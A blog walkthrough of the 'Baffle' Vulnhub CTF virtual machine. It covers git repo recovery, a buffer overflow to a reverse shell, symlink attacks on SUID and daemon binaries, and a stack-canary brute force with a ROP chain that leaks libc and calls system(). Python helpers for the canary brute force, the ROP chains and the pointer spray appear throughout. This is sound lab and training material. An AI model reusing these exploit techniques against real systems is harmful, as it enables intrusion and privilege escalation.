Friday, 30 December 2016

Baffle - DC416: 2016 - Vulnhub Solution - Write-up

This is the first time I've ever done a write-up for a Vulnhub VM, but I figured it was about time I started.  In addition, 'Baffle' was the hardest vulnerable VM I've tackled to date, as it required a large degree of binary analysis and reverse engineering, something I don't have all that much experience in.  I used Kali Linux with GDB+PEDA for all binary analysis.

Baffle is one of four vulnerable VMs released on 5 December 2016 as part of DefCon Toronto's first offline CTF event.  You can find all the information related to it here.  With that said, let's get on with it.

I won't cover the exact details of everything I did; I'll try to stick to the important bits.  So: Baffle fired up, IP address determined (netdiscover), entry added to the hosts file (victim).  Let's see what we're working with.

From reading the blurb on Vulnhub, I knew that each of the four DC416 boxes had a landing page, so let's take a look:

So we know this much so far:

  • Five flags to find, and their format
  • There's a web server of some description running on port 80
  • We don't need to brute-force any usernames/passwords
At this point I did my usual check for any admin/login (html|php) files, but couldn't immediately find anything useful.  Let's see if dirb can shed any light on what might be available.

Oooh, .git, looks like a possible GIT repo.  We shall have to pull that down and take a look.  However, before I get too carried away, let's fire up nmap and see what else might be available to play with.

A standard TCP SYN scan of the box confirmed the existence of a GIT repo, along with the last commit message, which seems a little worrying......

I'll save you the trouble of waiting on a full UDP scan: there's nothing running.

So we've got:

  • Webserver on port 80 (nginx 1.6.2) - We already knew this existed
  • SSH on port 22 - Might be worth a look, if we can find a username/password
  • Something on port 6969...........
At this point I got all excited and went off on a several-hour-long wild goose chase, seeing if port 6969 had anything to do with BitTorrent.  It did not.  Grr, fine, I'll go take a look at the GIT repo....

Let's clone it!

Pardon me?  

Cue twenty minutes of furious Googling to make sure I wasn't being a total idiot......nope, not a total idiot at all.  There's no .git file.....

Now I'm no git expert, but I do know that there's supposed to be a .git file, and there isn't.  I guess that curious message in the last commit might explain something.  Looks like we've got a busted git repo.  I'll just download the entire thing using wget and poke at it on my machine.

Running wget -r http://victim/.git/ downloaded the entire .git folder to my machine.  However, it also created about a million and one index.html files that I don't want; a quick bit of shell work will get rid of those.
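
For anyone who would rather not hand-craft the shell one-liner, here is a minimal Python sketch of the same clean-up. It assumes the mirror ends up in ./victim/.git (wget -r names the top directory after the host) and that no genuine repository file is called index.html. The function name is my own.

```python
import os

def remove_wget_index_files(root):
    """Delete every index.html that `wget -r` saved from directory listings.

    Assumption: no real git file under `root` is named index.html.
    Returns the sorted list of deleted paths so you can check what went.
    """
    removed = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name == "index.html":
                path = os.path.join(dirpath, name)
                os.remove(path)
                removed.append(path)
    return sorted(removed)
```

Call it as remove_wget_index_files("victim/.git") and review the returned list before running any git commands.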

Great, we now have a git repo, sans a .git file.  Let's see if we can recover anything.  What about some logs?

Great!  We have some logs, and we also have a potential username: Alice.  Things aren't looking too good for Alice, though; it seems that she's blaming her cat, and we might not have a particularly happy program to play with.  Let's see if we can actually get any source code out of this thing.

Great!  So what's in hellofriend.c?

Right, so we've got a C file, cool.  What does it do?  Not a great deal by the looks of things......

We're allocating a buffer, filling it with zeros, setting up some more buffers, and then checking the request type......well, that bit isn't done yet.

This is all well and good, but it would be nice to see the git logs alongside the source code and the changes that were made.  After some googling, the answer turned out to be: git log -p

This produced a complete log of all git commits, along with the comments, and what changes were made.  After browsing through the logs and code for a bit (which is huge and I'll put a copy up here if I can figure out how), I spotted a few things:

  • A single program 'hello.c' has been written, and subsequently trashed.....
  • It appears to read from files
  • It appears to write to files
  • There are two branch conditions: 1 = read, 2 = write
At this point there is probably a nice, elegant way to obtain the complete binary from the git logs, but I didn't know how to do it.  I did, however, see this in the logs:

That looks a lot like Base64 encoding to me, and the fact that the file is called 'project.enc' suggested it might be.  So I extracted the text into a file, Base64 decoded it, and made it executable.
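
Here is a minimal sketch of that extraction step. It assumes you have saved the relevant hunk of git log -p output to a file. As one of the commenters below points out, you must strip the diff prefix ('+' for added lines, '-' for removed ones) before decoding. The sketch does that and also skips the '+++'/'---' file headers. The function and file names are illustrative.

```python
import base64
import os
import stat

def decode_diff_blob(diff_text, prefix="+"):
    """Rebuild a Base64 blob from one side of a `git log -p` hunk and decode it.

    Lines starting with `prefix` are payload; '+++ ' / '--- ' headers are skipped.
    Base64 never contains spaces, so a payload line can't look like a header.
    """
    header = prefix * 3 + " "
    chunks = []
    for line in diff_text.splitlines():
        if line.startswith(header):
            continue  # file header such as '+++ b/project.enc'
        if line.startswith(prefix):
            chunks.append(line[1:].strip())  # drop the diff marker
    return base64.b64decode("".join(chunks), validate=True)

def write_executable(path, data):
    """Write the decoded bytes and add execute permission, like chmod +x."""
    with open(path, "wb") as fh:
        fh.write(data)
    mode = os.stat(path).st_mode
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
```

For example, read the saved hunk with open("project.diff").read() and pass the result of decode_diff_blob to write_executable("project", ...).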

Looks promising!

Ace, this does indeed look like our binary.  The questions are what it does, how it does it, and whether it contains any vulnerabilities.  At this point I began studying the binary, single stepping through it and taking notes.  I also assumed that this is in fact the program running on our somewhat mysterious port 6969.

After going through the code for a while, I noted that if branch condition 1 was taken, a file would be read.  This can be seen below:

The highlighted instructions essentially show that if the branch condition is 1, the program opens a file and reads its contents.  So great, if the input starts with a 1, read a file.  Not quite; there's an odd instruction at +92 which increments EAX by one, so the 1 needs to be in the second position of the string.  It's far easier to show how it works using ltrace:

So great, it appears to open a file, let's make sure it works.

Awesome, we can use it to read a file.  Note that you have to pad the name with arbitrary characters so that it fits.  So now it's time to find out whether this is in fact the program running on port 6969, and whether there's a file called flag.txt that it can access.

Beautiful, we have our first flag: FLAG{is_there_an_ivana_tinkle}.  This wasn't quite as smooth as illustrated here; a lot of testing and single stepping was required to figure out exactly how the program worked.
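
To make the off-by-one from the instruction at +92 concrete, here is a toy Python model of the dispatch. It assumes only what the disassembly shows: the type byte comes from index 1, not index 0. The filler byte and the helper names are my own, and the model does not cover the exact layout of the body, including the padding mentioned above.

```python
READ_FILE = 0x01   # branch 1: open and read a file
WRITE_BUF = 0x02   # branch 2: copy the input into a fixed buffer

def request_type(request: bytes) -> int:
    """Toy model: because of the increment at +92, the type is the second byte."""
    if len(request) < 2:
        raise ValueError("request too short to carry a type byte")
    return request[1]

def build_request(kind: int, body: bytes, filler: bytes = b"A") -> bytes:
    """Hypothetical helper: one filler byte, then the type byte, then the body."""
    if len(filler) != 1:
        raise ValueError("exactly one byte must precede the type byte")
    return filler + bytes([kind]) + body
```

For example, build_request(READ_FILE, b"flag.txt") yields b"A\x01flag.txt", which this model dispatches to the read branch.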

I also tried to read additional files, but without knowing any specific file names, we'd just be guessing.  So it's time to move on and see what happens if branch condition 2 is hit.

Above, you can see the section of code that runs when branch condition 2 is taken.  If you follow the code, you'll see that it copies the data passed in into a buffer, and that's it.  It just copies the data; it doesn't do anything with it afterwards.  This immediately looked like it had been written purely to be overflowed.  It was time to test this assumption.

The interesting bits shown in the above image are:
  • +265 -  If the second byte of input is a 0x02
  • +345-353 - Do some weird stuff with the string pointer.....
  • +362 - Fixed memory address of our buffer 
  • +410 - 0x7d0 (2000) bytes, the amount of bytes to copy into the buffer
So we have a similar process to the previous branch condition, if the second byte of the input is a 0x02, copy whatever was entered by the user into a buffer at a fixed address (0x600de0).

At this point, to keep this document readable in under a day, I won't cover the complete analysis of the binary; I'll leave that as an exercise for the reader.  However, after a lot of manual fuzzing and single stepping, it seemed that if a specific sequence of strings was entered as input, it was possible to gain control over RIP through a buffer overflow.  The question now was: can we get some shell-code in there?

Awesome, no security is in place.  Let's build a payload.

The key to this part of the challenge was to understand how the input was processed (hint: null bytes).  If you look back at the branch condition 2 disassembly, you can see some odd pointer manipulation happening at +345-353.  Unfortunately, my notes from this part of my analysis are terrible (always keep good notes!), so I'll just show the exploit I created, which aimed to create a reverse shell on port 1337.  The shell-code I used is available here.

This is probably going to make seasoned exploit writers gag, and probably Python programmers too; but remember this is all somewhat new to me, so everything is a learning experience.  Let's try throwing our payload at port 6969 and see what happens.

Hooray, we're in as Alice!  Time to take a look around and see what we can find.

OK, so these are our users on Baffle, good to know.  After some manual searching through the file system, I also came across an email to Alice in /var/mail:

Oh, really?

Well, I certainly don't have any authentication codes; maybe there's a vulnerability in this app?  I copied the files to my host machine and started playing about with them.  Noticing the structure of the /home/bob/filez directory, I also created the two files flag.txt and auth.txt.  Even more interesting, flag_vault is an SUID binary.  Privilege escalation, maybe?

Uh oh!  This is new.  Not only is the NX bit set, we're also dealing with a stack canary.  A stack canary, or stack cookie, is a value stored on the stack between a function's local buffers and its saved return address.  An attacker therefore cannot overwrite the return address without also overwriting the canary, which is checked before the function returns.  If the stored canary and the original value don't match, stack smashing is detected and the program is terminated.  You can read all about them here.
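
To show why the canary stops a straightforward return-address overwrite, here is a toy Python model of a single frame. It is my own simplification, not how any real compiler lays out memory. It ignores the saved frame pointer and alignment padding, and it uses a fully random canary, whereas glibc normally zeroes the lowest byte.

```python
import os

class ToyFrame:
    """Toy stack frame laid out as [buffer][canary][return address]."""

    def __init__(self, buf_size, ret_addr):
        self.buf_size = buf_size
        self.canary = os.urandom(8)  # fresh random secret, as on each program start
        self.memory = bytearray(buf_size) + bytearray(self.canary) + bytearray(ret_addr)

    def unchecked_copy(self, data):
        """Copy with no bounds check, like a careless memcpy/strcpy."""
        self.memory[:len(data)] = data

    def function_return(self):
        """Epilogue: compare the stored canary before trusting the return address."""
        stored = bytes(self.memory[self.buf_size:self.buf_size + 8])
        if stored != self.canary:
            raise RuntimeError("*** stack smashing detected ***")
        return bytes(self.memory[self.buf_size + 8:self.buf_size + 16])
```

A 16-byte write into a 16-byte buffer returns normally. A longer write that reaches the return address has to pass through the canary first, so the check fires before the forged address is ever used.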

OK, forgetting about canaries for the moment, how does this program work?

OK, simple enough.  The contents of the auth.txt file are checked against whatever the user entered.  If they match, the program reads the contents of flag.txt.  After confirming this, I spent several hours buggering about with ways to bypass the stack canary, which led me to this conclusion: there are two ways to get the flag from this vault, the simple way and the convoluted way that I did it.

Let's begin with the simple way.

As you can see from above, the program uses relative path names to refer to files, leaving it wide open to some sym-link attack goodness.

The setup is this: create a new directory 'test' in Alice's home directory.  Create an 'auth.txt' file in it containing whatever you like.  Then create a symlink named 'flag.txt' which points into /home/bob/filez/flag_vault, like this:

Beautiful, we have not only our second flag, but an SSH password for Bob, so we can now get a decent shell to use.  So our second flag is: FLAG{tr3each3ry_anD_cUnn1ng}.
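
The directory staging described above can also be sketched in Python. This assumes it runs as Alice on Baffle, and the symlink target is an assumption on my part: the real flag.txt sitting next to flag_vault, taken here to be /home/bob/filez/flag.txt. I haven't confirmed whether auth.txt should end with a newline; that depends on how flag_vault compares the input.

```python
import os

def stage_symlink_dir(workdir, auth_code, real_flag):
    """Create workdir/auth.txt with a code we control and workdir/flag.txt as a
    symlink to the real flag. A binary that opens the relative names 'auth.txt'
    and 'flag.txt' resolves them inside workdir when it is run from there.
    """
    os.makedirs(workdir, exist_ok=True)
    with open(os.path.join(workdir, "auth.txt"), "w") as fh:
        fh.write(auth_code)  # trailing newline or not depends on the comparison
    link = os.path.join(workdir, "flag.txt")
    if os.path.lexists(link):
        os.remove(link)  # replace any stale file or link
    os.symlink(real_flag, link)
    return link
```

After staging, change into the directory and run the SUID binary by its absolute path, entering the same code you wrote to auth.txt.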

Backtracking slightly, let's take a look at the somewhat convoluted way I used to get the flag.  I got very preoccupied with the stack canary and wondered if there was some way to bypass it and gain privilege escalation.  After a lot of debugging, I noted that if stack smashing was detected (through an overwritten canary value), the function __stack_chk_fail was called, which in turn called __fortify_fail, which then informed the user that the program had been terminated.

After a lot more reading, I came across this article, which describes a six-year-old CVE relating to SUID binaries that use stack canaries.  The issue is that when the program is terminated, __fortify_fail informs the user and provides a handy stack trace, like this:

The exact location of the canary was determined through a lot of debugging and fuzzing.  The interesting bit here is highlighted.  The name of the process that was terminated actually comes from argv[0]; the handler simply prints whatever string argv[0] points to.  What happens if we point it at a different buffer, like, say, the buffer that contains the contents of the auth.txt file?

The plan here is this: perform a buffer overflow long enough to replace the argv[0] pointer, deliberately overwriting the stack canary along the way to trigger the stack smashing termination, which will then print the string at what it thinks is argv[0].  From analysing the binary, we can see that the buffer containing the contents of the auth.txt file is loaded at the fixed address 0x08049ce0.  Let's try this out:

Seems it didn't like our code.  What's happening on the other terminal that injected the netcat payload?

Awesome!  We can now give this code to the flag_vault and get our flag.  I guess bonus points for us for getting the flag and the auth code.  Right?......
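
For reference, here is a sketch of how such an overflow string can be assembled. It assumes flag_vault is a 32-bit binary (the 0x0804xxxx address suggests so) and that the argv[0] pointer sits some unknown distance above the overflowed buffer. Rather than computing that distance, the sketch simply repeats the target address. The filler length and repeat count are placeholders to tune in a debugger, not the values from my run.

```python
import struct

AUTH_BUF = 0x08049CE0  # fixed address of the auth.txt contents (from the analysis)

def argv0_spray(target, filler_len, count):
    """Return filler followed by `count` little-endian copies of a 32-bit pointer.

    The filler and pointers deliberately run over the canary (to trigger the
    stack smashing handler); one of the repeated pointers is meant to land on
    the argv[0] slot further up the stack.
    """
    return b"A" * filler_len + struct.pack("<I", target) * count
```

Repeating the pointer trades precision for robustness: any copy that lands on the argv[0] slot is enough for the handler to print the auth code.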

OK, two flags down, let's go find the third.  Let's begin by SSH'ing in as Bob using our new credentials.

After poking around a bit, I found this:

Oooh, Charlie's password!  Nope, red herring :D

After some more poking, the next thing of interest that I found was a file named ctfingerd in the /home/bob/binz directory.  Let's run that and see what it does.

OK, we can't run it, as it's already in use.  Let's see where it might be.  Netstat tells us there's something listening on port 7979; that must be it!  Connecting to localhost on port 7979 asks us for a user to query, so we try Bob and get some text back, which I recognised as the contents of the .plan file that exists in each user's home directory.  Let's also check Charlie's .plan file.  Hmm, so he has a flag, does he....

At this point I downloaded the ctfingerd program locally so I could play about with it.

So it seems that this program will read the .plan file of whichever user is specified.  However, it once again does this using relative path names, and it seems to accept a path as the username.  So I managed to get the third flag using the approach shown below:

Awesome, another spot of sym-link manipulation has given us the third flag: FLAG{i_haz_sriracha_ice_cream}.  Hey, maybe we can use this to get the flag from the vulnhub home directory!?

Grumble.  Oh well, it was worth a shot.  This also shows that we're going to need to get into the vulnhub home directory if we want that flag.

OK, so Vulnhub owns the file, and it's running as Vulnhub.  If we can find a vulnerability, we might be able to spawn a shell as Vulnhub.  Let's take a look at the ctfingerd binary.

Once again we are faced with a 64-bit, NX-enabled, stack-canary-protected binary; this isn't going to be easy to break.  I started by debugging the binary to see if I could get a buffer overflow to occur, so I fired up ctfingerd locally and started fuzzing it.

You'll see that in the event of the process being terminated, we lose the final "---" characters from the server response.  That will come in useful later!

After some manual fuzzing, it appeared that we had 1000 bytes to play with before the stack canary.  From what I know about stack canaries, immediately after the canary should come the saved RBP, then the return address.  Again, I'm not going to go into depth on the binary analysis, as it would take quite a while.  If people are super interested I'll write a separate blog post.

So after some digging, it appears we have a potential buffer overflow vulnerability.  However, to make use of it, we have to overcome three problems: first, the stack canary; second, NX is enabled, so we can't execute shell-code injected onto the stack; and lastly:

ASLR is enabled on Baffle, so things are going to move about all over the shop.  OK, I got my thinking cap on here.

The stack canary cannot be bypassed, nor can we purposely overwrite it like in the last attack, so maybe there is a way to brute force it?  Each time the ctfingerd program is started, a new canary is generated, so there's no way of knowing it in advance.  However, after reading this article, something became apparent.  The TL;DR is that when a process forks, the child process inherits the canary from its parent.  So as long as the parent process stays alive, every connection is handled by a child with the same canary; we can recover it one guess at a time and then reuse it in the connection that injects our payload.

The second problem to overcome is the nx bit being enabled.  We can't execute any shell-code from the stack, so we're going to have to use Return Oriented Programming (ROP) to perform any operations we need.  I'll cover ROP a little more when I discuss the exploit I developed.  You can read more about it here.

Lastly, ASLR is enabled on Baffle, so libc is going to be at a different location each time the program is run, and we can't rely on any hard-coded memory locations.  I read an excellent article on dealing with ASLR here (written by the author of Baffle himself!).

Rather than discussing the binary analysis, I think it's probably easier to show the exploit I wrote, and explain it along the way.

OK, we begin by brute forcing the canary value.  Essentially try all 256 possibilities (0x00-0xFF) on each byte of the canary in sequence.  If we don't terminate the process, we'll get the "---" in the server's response, so we know that byte is good.  Repeat this process for all 8 bytes of the canary.
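
The brute-force loop itself is small. Below is a sketch with the network side abstracted into a callable, so the logic can be tested offline. Here `survives` is a hypothetical function that sends the payload to ctfingerd and returns True if the reply still ends with the '---' marker. The 1000-byte filler matches the offset found above; everything else is an assumption.

```python
from typing import Callable

def brute_force_canary(prefix: bytes, survives: Callable[[bytes], bool], size: int = 8) -> bytes:
    """Recover the canary one byte at a time.

    prefix:   filler that exactly reaches the canary (1000 bytes for ctfingerd)
    survives: returns True if the forked child did not abort on this payload
    Only works because every forked child shares the parent's canary: a correct
    partial guess leaves the remaining original bytes intact, so the check passes.
    """
    known = b""
    for _ in range(size):
        for candidate in range(256):
            guess = known + bytes([candidate])
            if survives(prefix + guess):
                known = guess
                break
        else:
            raise RuntimeError(f"no byte kept the process alive after {known.hex()}")
    return known
```

In the worst case this takes 8 × 256 = 2048 connections. In practice it takes fewer, since glibc's canary typically has a zero lowest byte, which is the first one tried.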

In a moment we're going to need to figure out where libc is loaded.  In order to do that we'll have to make a ROP chain to call write() so it can provide us with that information.  This is referred to as an information leak, essentially we're calling write() and asking it to give us the data stored at a specific memory address.  That address is the Global Offset Table (GOT) entry for sprintf.  This isn't the article to fully explain how lazy loading and the GOT/PLT work, but you can find plenty of information about it online.

You might be wondering why in the server response, we see the FD number.  I wondered this at first myself, but once I got into exploit writing it became clear.  It's provided so we can perform the information leak.  If you're writing your own client/server program, it's probably a good idea to keep this kind of information to yourself!

Once we've brute forced the canary and figured out which socket we want the process to talk to us on, it's time to inject a payload to leak the address of sprintf, and from that calculate where in memory libc is loaded.  Why choose sprintf?  Ultimately it doesn't matter which function you target; you just need to make sure that it has been called by the process before you inject your payload, so that its GOT entry already holds the resolved libc address.  I could have used memset; sprintf just happened to be the first one I saw.

The next portion of the exploit sets up our payload so that we can leak sprintf's address and calculate libc's base address.  You'll also notice that I hard coded in the canary value, this was just for convenience/testing sake and you can of course automate it.  And again, the value I'm using won't be the same for you.  Or it might, it's possible!

Lines 54-59 set up the addresses of everything we know.  The ROP gadgets necessary for the exploit were found using the GDB-PEDA command 'ropsearch'.

Unfortunately we don't have a gadget for controlling what's in RDX (the length argument to write()), so we're just going to have to hope that it already holds a value of at least 8!

The offset of write() and the libc offsets were obtained using objdump and readelf respectively.  An important point to note is that Baffle and my Kali Linux box are using different versions of libc, so I had to update the exploit before I ran it on Baffle.  The commands are the same; we'll just get different offsets.  So the values you see in the picture below are for my Kali Linux box, and the values in the exploit code are for Baffle.
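
If you'd rather not eyeball the grep output, a small parser can pull the offsets out. This is a rough sketch. It assumes the column layout of the readelf -s / readelf -a symbol tables, the same layout as the output pasted in the comments below. It matches the exact symbol name, so it skips lookalikes such as svcerr_systemerr or _IO_sprintf.

```python
def symbol_offset(readelf_output: str, name: str) -> int:
    """Return the value (offset within libc) of `name` from readelf symbol output.

    Expected columns: Num: Value Size Type Bind Vis Ndx Name
    The version suffix ('@@GLIBC_2.2.5') is ignored when comparing names.
    """
    for line in readelf_output.splitlines():
        fields = line.split()
        if len(fields) >= 8 and fields[7].split("@")[0] == name:
            return int(fields[1], 16)
    raise KeyError(name)
```

Run it on the output of readelf -s against Baffle's libc, not your local one, for the reason given above.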

The ROP chain injection can now occur.  We call write, telling it to write the GOT entry for sprintf to the socket that the server is communicating with us over.  Remember to add one to the socket number if you do this in separate communications!
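
Here is a sketch of how the leak chain is laid out on the stack. It assumes the x86-64 calling convention (first three arguments in RDI, RSI, RDX) and the common 'pop rsi; pop r15; ret' gadget for setting RSI. All addresses are parameters. The test values are placeholders, not the ones from my exploit.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian value."""
    return struct.pack("<Q", value)

def leak_chain(filler_len, canary, pop_rdi, pop_rsi_r15, write_plt, fd, got_entry):
    """filler | canary | saved RBP | pop rdi | fd | pop rsi; pop r15 | GOT | junk | write@plt

    Executes write(fd, got_entry, <whatever RDX holds>); there is no RDX gadget.
    """
    payload = b"A" * filler_len
    payload += canary                                       # the brute-forced value
    payload += b"B" * 8                                     # saved RBP, value irrelevant here
    payload += p64(pop_rdi) + p64(fd)                       # RDI = socket fd
    payload += p64(pop_rsi_r15) + p64(got_entry) + p64(0)   # RSI = &GOT[sprintf], R15 = junk
    payload += p64(write_plt)                               # return into write@plt
    return payload
```

Each gadget pops the next value off the stack into a register and then returns into the next address. That is how values placed on the stack become function arguments.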

OK, so far so good (I think), if we run this on baffle we should be able to calculate the base address of libc and therefore calculate the address of system().  Let's try it.

Awesome!  We've leaked the address of sprintf, used that to calculate the base of libc, and finally determined the address of system.  We're now ready to build a payload that calls system().  Note that we can't just spawn a shell, as it will spawn in the background and we have no way of getting access to it.  Instead, we're going to have to spawn a reverse shell using netcat, much like we did in the previous attack.
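
The arithmetic is just a subtraction and an addition. The sketch below uses the sprintf and system offsets from the readelf output a reader posted in the comments (0x55940 and 0x45390). The example leak uses the libc base from that reader's ldd line. Those values belong to that reader's libc, so substitute the ones from Baffle's libc.

```python
import struct

SPRINTF_OFFSET = 0x55940  # from the reader's readelf output; replace with Baffle's
SYSTEM_OFFSET = 0x45390

def resolve_system(leak, sprintf_off=SPRINTF_OFFSET, system_off=SYSTEM_OFFSET):
    """Turn the leaked GOT bytes into (libc_base, system_address)."""
    leaked_sprintf = struct.unpack("<Q", leak[:8])[0]  # GOT entries are little-endian
    libc_base = leaked_sprintf - sprintf_off
    if libc_base & 0xFFF:
        # libc is mapped on a page boundary, so a sane base ends in 000
        raise ValueError(f"suspicious libc base {libc_base:#x}: wrong offset or wrong leak?")
    return libc_base, libc_base + system_off

base, system = resolve_system(struct.pack("<Q", 0x7F5D3ABD6940))
print(hex(base), hex(system))  # 0x7f5d3ab81000 0x7f5d3abc6390
```

The alignment check also tends to catch the memset problem discussed in the comments. In glibc, memset is resolved through an IFUNC, so its GOT entry most likely holds a CPU-specific variant (such as an SSE2 one) rather than the address of the symbol named memset. Subtracting memset's offset from that value then gives a base that doesn't end in 000.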

The code above is the meat of the payload.  It injects our string into memory using a call to read(), which is similar to write() except that this time we send data over the socket and it puts it in memory: our string.  Why choose 0x601010 for the string location?  It comes down to a simple requirement: we need somewhere in memory we can write to!  We can't use the stack, as we don't know its address, and we don't have a 'push rsp; pop rdi; ret' type gadget.  That address was chosen as it's in the dynamic portion of the ELF file, the same area where the GOT is stored, and we know that's writable.  Be careful when choosing targets for planting strings: the last thing you want to do is overwrite a GOT entry and cause the program to super fail.  In this instance it didn't really matter if we overwrote anything afterwards; we'd soon be leaving.....
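
Here is a sketch of this second-stage chain, under the same assumptions as the leak chain: x86-64 argument registers, a 'pop rdi; ret' gadget and a 'pop rsi; pop r15; ret' gadget, and RDX left at whatever it holds. `prefix` stands for the filler, canary and saved RBP. After sending the chain, you send the command string, NUL-terminated, for read() to store at 0x601010. The gadget and function addresses are placeholders.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian value."""
    return struct.pack("<Q", value)

SCRATCH = 0x601010  # writable address used for the command string

def stage2_chain(prefix, pop_rdi, pop_rsi_r15, read_plt, system_addr, fd, scratch=SCRATCH):
    """read(fd, scratch, rdx) to plant the command, then system(scratch)."""
    chain = prefix                                      # filler + canary + saved RBP
    chain += p64(pop_rdi) + p64(fd)                     # RDI = socket fd
    chain += p64(pop_rsi_r15) + p64(scratch) + p64(0)   # RSI = scratch, R15 = junk
    chain += p64(read_plt)                              # read(fd, scratch, rdx)
    chain += p64(pop_rdi) + p64(scratch)                # RDI = pointer to our string
    chain += p64(system_addr)                           # system(scratch)
    return chain

def command_bytes(cmd):
    """The command as read() should receive it: NUL-terminated for system()."""
    return cmd.encode() + b"\x00"
```

The command has to fit in whatever length RDX happens to hold. Some newer glibc builds also crash inside system() unless RSP is 16-byte aligned. The usual fix is an extra bare 'ret' gadget before the system address, but whether you need it depends on the libc.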

So essentially, it's a case of putting the values we need onto the stack, popping them into the right registers using the ROP gadgets, and calling the functions.  Let's start a netcat listener on port 99 and hit Enter.... (fingers crossed)

Hooray, we're in.  Now where's that flag.....

Fantastic, the fourth flag: FLAG{i_tot_i_saw_a_puddy_tat}

Great, just one flag left.........

At this point I got a bit stuck, and spent a couple of hours floundering about in the file system, looking seemingly everywhere.  No flag to be found.....hmm

I jumped into the #vulnhub IRC channel and had a quick chat with Baffle's author, superkojiman about what I'd found thus far, and how the final flag was proving elusive.  He laughed, and told me that the flag I was missing was actually the first one, and I should backtrack to before I got a shell.....

Before I had a shell?  Before that I had nothing.....maybe the git repo?  Perhaps I missed something in the source code?

After a few minutes of reviewing the source code and git logs, I found this.  See if you can spot anything...

Can you see it?  Maybe this will help

The final (or first) flag: FLAG{ARSE_REQUEST}

So there you have it, all of the flags found:

flag1: is_there_an_ivana_tinkle
flag2: tr3each3ry_anD_cUnn1ng
flag3: i_haz_sriracha_ice_cream
flag4: i_tot_i_saw_a_puddy_tat
flag5: ARSE_REQUEST

Apologies if this write-up was too long or didn't provide enough detail in certain areas; it's the first I've ever written.  Any comments or suggestions would be greatly appreciated!

Big shout out to superkojiman for creating this VM, it was super challenging and a lot of fun.  Also kudos to T0w3ntum for helping bounce ideas back and forth.

More write-ups to come, and if this has taught me anything, it's to keep better notes!!


  1. Finally a walkthrough! I took the same approach as you and got all flags except the first one...

    1. How did you decode that long string? When I try to copy it from the console to echo, it says base64: invalid input.

    2. Okay, I got it by checking out the exact commit; project.enc was then in the git repository.

  2. Very, very, very great job MrTHaggar!
    Could you please tell me how you extracted project.enc?

    1. Thank you!

      I just copied the text out of the log file into a plain text file, then Base64 decoded it. Just remember to remove all of the '-' or '+' characters from the start of each line.

  3. Hi Bro, I have a problem when trying to get the system address. I get the leaked address of sprintf from the program.
    system address = leak_sprintf - sprintf_offset (0x55940) + system_offset (0x45390).
    So when I put it into the payload, RIP points to the system address, but it is corrupted.
    $ ldd ctfingerd => (0x00007ffed2fde000) => /lib/x86_64-linux-gnu/ (0x00007f5d3ab81000)
    /lib64/ (0x0000556b03f14000)

    $ readelf -a /lib/x86_64-linux-gnu/ | grep "system"
    225: 0000000000137c20 70 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.2.5
    584: 0000000000045390 45 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
    1351: 0000000000045390 45 FUNC WEAK DEFAULT 13 system@@GLIBC_2.2.5

    $ readelf -a /lib/x86_64-linux-gnu/ | grep "sprintf"
    110: 00000000000766d0 343 FUNC WEAK DEFAULT 13 vasprintf@@GLIBC_2.2.5
    152: 0000000000055940 143 FUNC GLOBAL DEFAULT 13 sprintf@@GLIBC_2.2.5
    407: 0000000000115ae0 163 FUNC GLOBAL DEFAULT 13 __vsprintf_chk@@GLIBC_2.3.4
    525: 0000000000070160 170 FUNC WEAK DEFAULT 13 vsprintf@@GLIBC_2.2.5
    726: 0000000000070160 170 FUNC GLOBAL DEFAULT 13 _IO_vsprintf@@GLIBC_2.2.5
    903: 0000000000055940 143 FUNC GLOBAL DEFAULT 13 _IO_sprintf@@GLIBC_2.2.5
    1250: 00000000000559d0 143 FUNC WEAK DEFAULT 13 asprintf@@GLIBC_2.2.5
    1880: 0000000000117d10 359 FUNC GLOBAL DEFAULT 13 __vasprintf_chk@@GLIBC_2.8
    1929: 0000000000115a40 133 FUNC GLOBAL DEFAULT 13 __sprintf_chk@@GLIBC_2.3.4
    1932: 00000000000559d0 143 FUNC GLOBAL DEFAULT 13 __asprintf@@GLIBC_2.2.5
    2115: 0000000000117c80 138 FUNC GLOBAL DEFAULT 13 __asprintf_chk@@GLIBC_2.8
    Please help me. Thanks

    1. Sorry, I tried it again and it worked. But if I use leak_memset the result is wrong. Can you help me figure out why? Thanks bro.

    2. I used sprintf instead of memset, as I was getting calls to SSE2_memset (or similar) and I wasn't sure why. Might be worth checking in a debugger to see if it's happening.

  4. Hello there,

    Thanks a lot for the tutorial; this type of write-up helps me a lot in my self-teaching and I can't be thankful enough to people like you :).

    I'm having issues with the second flag in GDB, though. When I use "disas main", I only get the output below:

    Dump of assembler code for function main:
    0x00000000004008f7 <+0>: push %rbp
    0x00000000004008f8 <+1>: mov %rsp,%rbp
    0x00000000004008fb <+4>: sub $0x7f0,%rsp
    0x0000000000400902 <+11>: mov %edi,-0x7e4(%rbp)
    0x0000000000400908 <+17>: mov %rsi,-0x7f0(%rbp)
    0x000000000040090f <+24>: mov 0x2004aa(%rip),%rax # 0x600dc0
    0x0000000000400916 <+31>: mov $0x0,%esi
    0x000000000040091b <+36>: mov %rax,%rdi
    0x000000000040091e <+39>: callq 0x4005c0
    0x0000000000400923 <+44>: lea -0x7e0(%rbp),%rax
    0x000000000040092a <+51>: mov $0x7d0,%edx
    0x000000000040092f <+56>: mov $0x0,%esi
    0x0000000000400934 <+61>: mov %rax,%rdi
    0x0000000000400937 <+64>: callq 0x4005e0
    0x000000000040093c <+69>: lea -0x7e0(%rbp),%rax
    0x0000000000400943 <+76>: mov $0x7d0,%edx
    0x0000000000400948 <+81>: mov %rax,%rsi
    0x000000000040094b <+84>: mov $0x0,%edi
    0x0000000000400950 <+89>: callq 0x4005f0
    0x0000000000400955 <+94>: mov %eax,-0x4(%rbp)
    0x0000000000400958 <+97>: mov -0x4(%rbp),%edx
    0x000000000040095b <+100>: lea -0x7e0(%rbp),%rax
    0x0000000000400962 <+107>: mov %edx,%esi
    0x0000000000400964 <+109>: mov %rax,%rdi
    0x0000000000400967 <+112>: callq 0x400746
    0x000000000040096c <+117>: mov $0x0,%eax
    0x0000000000400971 <+122>: leaveq
    0x0000000000400972 <+123>: retq
    End of assembler dump.

